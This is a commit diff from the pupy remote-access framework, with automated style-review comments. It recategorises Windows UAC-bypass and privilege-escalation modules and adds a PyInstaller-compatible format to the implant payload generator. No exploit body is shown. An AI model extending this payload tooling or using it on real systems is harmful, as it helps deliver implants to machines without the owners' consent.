mirror of https://github.com/n1nj4sec/pupy.git
Merge remote-tracking branch 'upstream/master'
commit
ef36a137ea
|
@ -0,0 +1,75 @@
|
|||
from collections import OrderedDict
|
||||
from Crypto.Cipher import AES
|
||||
from Crypto.Hash import HMAC
|
||||
from Crypto.Hash import SHA256
|
||||
from Crypto.Hash import SHA256, HMAC
|
||||
from Crypto import Random
|
||||
from Crypto.Protocol.KDF import PBKDF2
|
||||
from Crypto.Util import Counter
|
||||
from cStringIO import StringIO
|
||||
from itertools import izip, starmap
|
||||
from operator import xor
|
||||
from StringIO import StringIO
|
||||
from struct import Struct
|
||||
import argparse
|
||||
import base64
|
||||
import binascii
|
||||
import bz2
|
||||
import code
|
||||
import collections
|
||||
import configparser
|
||||
import copy
|
||||
import cPickle
|
||||
import Crypto.Cipher
|
||||
import Crypto.Cipher.AES
|
||||
import Crypto.Hash.HMAC
|
||||
import Crypto.Hash.SHA256
|
||||
import Crypto.Util.Counter
|
||||
import datetime
|
||||
import errno, stat
|
||||
import fractions
|
||||
import __future__
|
||||
import getpass
|
||||
import glob
|
||||
import hashlib
|
||||
import hmac
|
||||
import imp
|
||||
import importlib
|
||||
import inspect
|
||||
import json
|
||||
import logging
|
||||
import math
|
||||
import multiprocessing
|
||||
import new
|
||||
import os
|
||||
import pkgutil
|
||||
import platform
|
||||
import Queue
|
||||
import random
|
||||
import re
|
||||
import rsa
|
||||
import shlex
|
||||
import shutil
|
||||
import site
|
||||
import socket
|
||||
import SocketServer
|
||||
import ssl
|
||||
import string
|
||||
import StringIO
|
||||
import struct
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
import urllib
|
||||
import urllib2
|
||||
import uuid
|
||||
import yaml
|
||||
import zlib
|
||||
if os.name == 'nt':
|
||||
import ctypes
|
||||
import ctypes.wintypes
|
||||
if os.name == 'posix':
|
||||
import pty
|
|
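Review bot: Several imports in this new file are redundant or shadow one another: `from Crypto.Hash import SHA256` and `from Crypto.Hash import HMAC` are repeated by `from Crypto.Hash import SHA256, HMAC`, and `from StringIO import StringIO` rebinds the name already bound by `from cStringIO import StringIO`, so that first binding is dead. Keeping a single `from Crypto.Hash import SHA256, HMAC` and a single `StringIO` import leaves the set of imported modules unchanged while removing the noise. The rendering has lost indentation, so I cannot tell whether `import ctypes` / `import ctypes.wintypes` and `import pty` actually sit inside the `if os.name == 'nt':` / `if os.name == 'posix':` guards; worth confirming against the source, since an unguarded `import pty` on Windows would fail at import time.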
@ -8,7 +8,7 @@ __class_name__="BypassUAC"
|
|||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
|
||||
|
||||
@config(compat="windows", category="exploit")
|
||||
@config(compat="windows", category="privesc")
|
||||
class BypassUAC(PupyModule):
|
||||
""" try to bypass UAC with Invoke-BypassUAC.ps1, from Empire """
|
||||
dependencies=["psutil", "pupwinutils.processes"]
|
||||
|
|
|
@ -4,7 +4,7 @@ from pupylib.utils.rpyc_utils import redirected_stdo
|
|||
from modules.lib.windows.migrate import migrate
|
||||
__class_name__="GetSystem"
|
||||
|
||||
@config(compat="windows", category="exploit")
|
||||
@config(compat="windows", category="privesc")
|
||||
class GetSystem(PupyModule):
|
||||
""" try to get NT AUTHORITY SYSTEM privileges """
|
||||
dependencies=["psutil", "pupwinutils.security"]
|
||||
|
|
|
@ -6,7 +6,7 @@ from modules.lib.windows.powershell_upload import execute_powershell_script
|
|||
__class_name__="PowerUp"
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
|
||||
|
||||
@config(compat="windows", category="admin")
|
||||
@config(compat="windows", category="privesc")
|
||||
class PowerUp(PupyModule):
|
||||
""" trying common Windows privilege escalation methods"""
|
||||
|
||||
|
@ -23,4 +23,4 @@ class PowerUp(PupyModule):
|
|||
|
||||
# parse output depending on the PowerUp output
|
||||
output = output.replace('\r\n\r\n\r\n', '\r\n\r\n').replace("\n\n", "\n").replace("\n\n", "\n")
|
||||
self.success("%s" % output)
|
||||
self.success("%s" % output)
|
||||
|
|
|
@ -7,7 +7,7 @@ import logging, argparse, sys, os.path, re, shlex, random, string, zipfile, tarf
|
|||
from pupylib.utils.network import get_local_ip
|
||||
from pupylib.utils.term import colorize
|
||||
from pupylib.payloads.python_packer import gen_package_pickled_dic
|
||||
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload
|
||||
from pupylib.payloads.py_oneliner import serve_payload, pack_py_payload, getLinuxImportedModules
|
||||
from pupylib.utils.obfuscate import compress_encode_obfs
|
||||
from network.conf import transports, launchers
|
||||
from network.lib.base_launcher import LauncherError
|
||||
|
@ -236,6 +236,7 @@ class ListOptions(argparse.Action):
|
|||
print "\t- exe_86, exe_x64 : generate PE exe for windows"
|
||||
print "\t- dll_86, dll_x64 : generate reflective dll for windows"
|
||||
print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
|
||||
print "\t- pyinst : generate a python file compatible with pyinstaller"
|
||||
print "\t- py_oneliner : same as \"py\" format but served over http to load it from memory with a single command line."
|
||||
print "\t- ps1_oneliner : load pupy remotely from memory with a single command line using powershell."
|
||||
|
||||
|
@ -254,7 +255,7 @@ class ListOptions(argparse.Action):
|
|||
print '\n'.join(["\t"+x for x in sc.get_help().split("\n")])
|
||||
exit()
|
||||
|
||||
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'py_oneliner', 'ps1_oneliner']
|
||||
PAYLOAD_FORMATS=['apk', 'exe_x86', 'exe_x64', 'dll_x86', 'dll_x64', 'py', 'pyinst', 'py_oneliner', 'ps1_oneliner']
|
||||
if __name__=="__main__":
|
||||
if os.path.dirname(__file__):
|
||||
os.chdir(os.path.dirname(__file__))
|
||||
|
@ -331,12 +332,15 @@ if __name__=="__main__":
|
|||
if not outpath:
|
||||
outpath="pupy.apk"
|
||||
get_edit_apk(os.path.join("payload_templates","pupy.apk"), outpath, conf)
|
||||
elif args.format=="py":
|
||||
elif args.format=="py" or args.format=="pyinst":
|
||||
linux_modules = ""
|
||||
if not outpath:
|
||||
outpath="payload.py"
|
||||
if args.format=="pyinst" :
|
||||
linux_modules = getLinuxImportedModules()
|
||||
packed_payload=pack_py_payload(get_raw_conf(conf))
|
||||
with open(outpath, 'wb') as w:
|
||||
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+packed_payload)
|
||||
w.write("#!/usr/bin/env python\n# -*- coding: UTF8 -*-\n"+linux_modules+"\n"+packed_payload)
|
||||
elif args.format=="py_oneliner":
|
||||
packed_payload=pack_py_payload(get_raw_conf(conf))
|
||||
i=conf["launcher_args"].index("--host")+1
|
||||
|
|
|
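Review bot: The new branch `elif args.format=="py" or args.format=="pyinst":` repeats the same comparison twice; `elif args.format in ("py", "pyinst"):` reads as one membership test and mirrors how the value is listed in `PAYLOAD_FORMATS`. The inner `if args.format=="pyinst" :` also carries a stray space before the colon. The `linux_modules` prefix is written to the output verbatim with only a newline separating it from `packed_payload`, and nothing says why it is there; a comment above `w.write(...)` such as `# pyinst: the static import list is prepended so it appears in the generated file` would help, though the exact intent should be confirmed with the author since I am inferring it from the `pyinst` help text. The enclosing `if __name__=="__main__":` block starts and ends outside these hunks.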
@ -4,5 +4,5 @@
|
|||
# Pupy is under the BSD 3-Clause license. see the LICENSE file at the root of the project for the detailed licence terms
|
||||
|
||||
#authorized categories
|
||||
categories=["general", "manage", "admin", "exploit", "network", "gather", "troll", "misc"]
|
||||
categories=["general", "manage", "admin", "exploit", "privesc", "network", "gather", "troll", "misc"]
|
||||
|
||||
|
|
|
@ -13,6 +13,14 @@ from pupylib.payloads.python_packer import get_load_module_code, gen_package_pic
|
|||
|
||||
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
|
||||
|
||||
def getLinuxImportedModules():
|
||||
'''
|
||||
'''
|
||||
lines = ""
|
||||
with open(os.path.join(ROOT,"conf","imports_done.py")) as f:
|
||||
lines=f.read()
|
||||
return lines
|
||||
|
||||
def pack_py_payload(conf):
|
||||
print colorize("[+] ","green")+"generating payload ..."
|
||||
fullpayload=[]
|
||||
|
@ -74,5 +82,3 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip="<your_ip>"):
|
|||
print 'KeyboardInterrupt received, shutting down the web server'
|
||||
server.socket.close()
|
||||
exit()
|
||||
|
||||
|
||||
|
|
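Review bot: `getLinuxImportedModules` is added with an empty docstring (`'''` / `'''`); the body reads `conf/imports_done.py` under `ROOT` and returns its text unchanged, so the docstring should state that, e.g. `'''Return the text of conf/imports_done.py (relative to ROOT) verbatim; IOError propagates if the file is missing.'''`. The `lines = ""` before the `with` block is dead: the block either assigns `lines` or raises, so the initializer can be dropped. The name says Linux but nothing in the body is platform-specific; if the file is meant to be Linux-only, the docstring is the place to say so. The second hunk in this file (`serve_payload`) only removes trailing blank lines.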